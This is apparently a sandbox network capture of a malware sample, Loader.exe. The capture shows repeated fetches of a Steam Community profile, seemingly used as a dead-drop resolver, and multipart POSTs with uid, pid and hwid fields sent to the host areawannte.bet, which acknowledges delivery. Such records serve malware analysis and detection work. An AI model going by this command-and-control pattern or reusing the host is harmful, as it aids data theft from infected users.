2025-03-11 00:13:51 UTC	821	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 00:13:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5owQ%2F2U%2FucLgMj4js2aGcflsqZD6NU20bUF0nq1ptyO5GHYPivmbVz%2FZUU1MwdAFlpY8U9vmKB49G0H4Nu2UAmGDg7oktA6wmWIaBdLP0eBxTM5q46hZrtRKCu4JFP2tA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e6d92bace23382-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18262&min_rtt=18017&rtt_var=7247&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2832&recv_bytes=15858&delivery_rate=144944&cwnd=250&unsent_bytes=0&cid=544def4b84ae7ab3&ts=1011&x=0"
2025-03-11 00:13:51 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 32 31 2e 31 30 31 2e 31 30 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 73.21.101.10"}}
2025-03-11 00:13:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49702	92.122.104.90	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:13:54 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 00:13:55 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 00:13:54 GMT Content-Length: 35725 Connection: close Set-Cookie: sessionid=f86378d1a5716bab6ded031f; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=None
2025-03-11 00:13:55 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 00:13:55 UTC	10154	IN	Data Raw: 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 Data Ascii: ype="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 00:13:55 UTC	11149	IN	Data Raw: 75 6f 74 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 Data Ascii: uot;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49703	188.114.96.3	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:13:56 UTC	273	OUT	POST /aRIsjI HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LJwwQDoy User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15060 Host: areawannte.bet
2025-03-11 00:13:56 UTC	15060	OUT	Data Raw: 2d 2d 4c 4a 77 77 51 44 6f 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 38 36 36 66 63 62 64 30 34 33 33 30 61 38 63 61 31 33 37 37 34 66 30 66 62 31 34 66 35 63 39 33 30 62 32 66 39 30 32 36 37 36 37 37 31 62 61 61 31 38 65 30 0d 0a 2d 2d 4c 4a 77 77 51 44 6f 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 4a 77 77 51 44 6f 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 42 31 31 39 43 30 39 32 41 35 41 41 32 32 30 44 46 34 38 30 30 Data Ascii: --LJwwQDoyContent-Disposition: form-data; name="uid"866fcbd04330a8ca13774f0fb14f5c930b2f902676771baa18e0--LJwwQDoyContent-Disposition: form-data; name="pid"2--LJwwQDoyContent-Disposition: form-data; name="hwid"1BB119C092A5AA220DF4800
2025-03-11 00:13:57 UTC	815	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 00:13:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S2y3C13bdEGYaVQWiA8BJt6KsL4bn5I1iizubwqfXTW9wVbsfAb5eOVe97KUX128LwGHLXCqpO8U3v5wyVI3mq7VG%2FaUQqMRZN1eKTtY412CosWEU3LR2vA5mIuyXKohrQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e6d94f691e3d59-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17555&min_rtt=17270&rtt_var=7046&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15991&delivery_rate=148125&cwnd=251&unsent_bytes=0&cid=6bb53f2b3ec44c4c&ts=1157&x=0"
2025-03-11 00:13:57 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 32 31 2e 31 30 31 2e 31 30 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 73.21.101.10"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49704	92.122.104.90	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:14:00 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 00:14:00 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 00:14:00 GMT Content-Length: 26244 Connection: close Set-Cookie: sessionid=d9ab4e469e607f0507c1cef5; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=None
2025-03-11 00:14:00 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 00:14:00 UTC	10154	IN	Data Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 73 63 68 69 6e 65 73 65 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 73 63 68 69 6e 65 73 65 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e7 ae 80 e4 bd 93 e4 b8 ad e6 96 87 20 28 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 Data Ascii: yle="display: none;"><div class="popup_body popup_menu"><a class="popup_menu_item tight" href="?l=schinese" onclick="ChangeLanguage( 'schinese' ); return false;"> (Simplified Chinese)</a>
2025-03-11 00:14:00 UTC	1668	IN	Data Raw: 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 22 3e 68 6f 6d 65 20 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 62 72 20 63 6c 65 61 72 3d 22 61 6c 6c 22 20 2f 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 09 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 65 67 61 63 79 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 73 70 61 63 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 09 09 09 09 09 3c Data Ascii: ://steamcommunity.com">home page</a>.</p></div><br clear="all" /></div></div></div>... responsive_page_legacy_content --><div id="footer_spacer" class=""></div><div id="footer_responsive_optin_spacer"></div><div id="footer"><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49705	92.122.104.90	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:14:02 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 00:14:03 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 00:14:03 GMT Content-Length: 26244 Connection: close Set-Cookie: sessionid=732063565917e108bc4b264b; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=None
2025-03-11 00:14:03 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 00:14:03 UTC	10154	IN	Data Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 73 63 68 69 6e 65 73 65 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 73 63 68 69 6e 65 73 65 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e7 ae 80 e4 bd 93 e4 b8 ad e6 96 87 20 28 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 Data Ascii: yle="display: none;"><div class="popup_body popup_menu"><a class="popup_menu_item tight" href="?l=schinese" onclick="ChangeLanguage( 'schinese' ); return false;"> (Simplified Chinese)</a>
2025-03-11 00:14:03 UTC	1668	IN	Data Raw: 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 22 3e 68 6f 6d 65 20 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 62 72 20 63 6c 65 61 72 3d 22 61 6c 6c 22 20 2f 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 09 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 65 67 61 63 79 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 73 70 61 63 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 09 09 09 09 09 3c Data Ascii: ://steamcommunity.com">home page</a>.</p></div><br clear="all" /></div></div></div>... responsive_page_legacy_content --><div id="footer_spacer" class=""></div><div id="footer_responsive_optin_spacer"></div><div id="footer"><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49706	92.122.104.90	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:14:05 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 00:14:06 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 00:14:06 GMT Content-Length: 26244 Connection: close Set-Cookie: sessionid=43a79e744c633f9ed688b363; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=None
2025-03-11 00:14:06 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 00:14:06 UTC	10154	IN	Data Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 73 63 68 69 6e 65 73 65 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 73 63 68 69 6e 65 73 65 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e7 ae 80 e4 bd 93 e4 b8 ad e6 96 87 20 28 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 Data Ascii: yle="display: none;"><div class="popup_body popup_menu"><a class="popup_menu_item tight" href="?l=schinese" onclick="ChangeLanguage( 'schinese' ); return false;"> (Simplified Chinese)</a>
2025-03-11 00:14:06 UTC	1668	IN	Data Raw: 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 22 3e 68 6f 6d 65 20 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 62 72 20 63 6c 65 61 72 3d 22 61 6c 6c 22 20 2f 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 09 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 65 67 61 63 79 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 73 70 61 63 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 09 09 09 09 09 3c Data Ascii: ://steamcommunity.com">home page</a>.</p></div><br clear="all" /></div></div></div>... responsive_page_legacy_content --><div id="footer_spacer" class=""></div><div id="footer_responsive_optin_spacer"></div><div id="footer"><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49707	92.122.104.90	443	7660	C:\Users\user\Desktop\Loader.exe

